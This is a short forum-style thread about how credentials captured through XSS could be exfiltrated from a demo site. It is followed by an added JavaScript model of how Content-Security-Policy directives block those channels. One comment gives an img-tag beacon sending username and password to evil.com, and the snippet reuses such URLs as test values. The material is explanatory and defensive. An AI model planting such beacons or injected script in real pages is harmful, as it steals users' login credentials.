by TedDoesntTalk 1795 days ago
I don’t see the vulnerability. His demo collects credentials then displays them ... all on the same domain websecurity.dev

So what? What am I missing?

How will he exfiltrate the data? With JS that posts it to another domain?

2 comments

> How will he exfiltrate the data? With JS that posts it to another domain?

Exactly. Alternatively, you can also use embeds, for example `<img src="https://evil.com/$user/$password">`.

If you have your code running and the credentials, exfiltration is no longer a problem.

If the attacker has XSS and gets the password, exfiltration is the easy part. JS offers many options, starting with fetch.

If they can run arbitrary JS on the site, can't they just change the target of the login form to their own server and exfiltrate credentials whether you used a password manager to fill them in or not? I'd be much more interested if you could exfiltrate without arbitrary JS, maybe in an img embed with the password injected into the URL or something?
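The three channels the commenters name (an `img` beacon, a `fetch()` from injected JS, and a retargeted login form) are each governed by a different Content-Security-Policy directive. As an added illustration that is not part of the thread, the following simplified CSP model shows which of them a given policy still lets through; the page origin websecurity.dev and the evil.com host come from the thread, the paths and policy strings are constructed.

```javascript
// Added example: a simplified model of how Content-Security-Policy treats the
// exfiltration channels discussed above. Not a full CSP implementation: sources
// are matched as exact origins or 'self' (no wildcards, schemes or paths).
const PAGE_ORIGIN = "https://websecurity.dev"; // origin from the thread

// Map each channel in the discussion to the directive that governs it.
const DIRECTIVE_FOR = { img: "img-src", fetch: "connect-src", form: "form-action" };

// Parse "img-src 'self'; connect-src 'self' https://api.example" into a lookup table.
function parseCsp(policy) {
  const out = {};
  for (const part of policy.split(";")) {
    const [name, ...sources] = part.trim().split(/\s+/);
    if (name) out[name] = sources;
  }
  return out;
}

// Is a request of this kind to this URL allowed by the policy?
// img-src and connect-src fall back to default-src when absent; form-action
// has no fallback (per the CSP spec), so it must be set explicitly.
// No applicable directive at all means the request is allowed.
function allowed(policy, kind, url) {
  const csp = parseCsp(policy);
  const directive = DIRECTIVE_FOR[kind];
  const sources = kind === "form" ? csp[directive] : csp[directive] ?? csp["default-src"];
  if (!sources) return true;
  const target = new URL(url).origin;
  return sources.some((s) => (s === "'self'" ? target === PAGE_ORIGIN : s === target));
}

// Evaluate the channels from the thread against one policy; returns the ones that go through.
// The attacker paths are constructed sample values.
function leakingChannels(policy) {
  const attempts = [
    ["img", "https://evil.com/alice/hunter2"],      // img beacon with credentials in the path
    ["fetch", "https://evil.com/collect"],          // fetch() from injected JS
    ["form", "https://evil.com/login"],             // login form action rewritten by injected JS
    ["fetch", "https://websecurity.dev/api/login"], // the site's own legitimate request
  ];
  return attempts.filter(([k, u]) => allowed(policy, k, u)).map(([k, u]) => `${k} ${u}`);
}
```

Note that `default-src 'self'` alone still leaves the form-retargeting channel open, which is why `form-action` has to be listed explicitly.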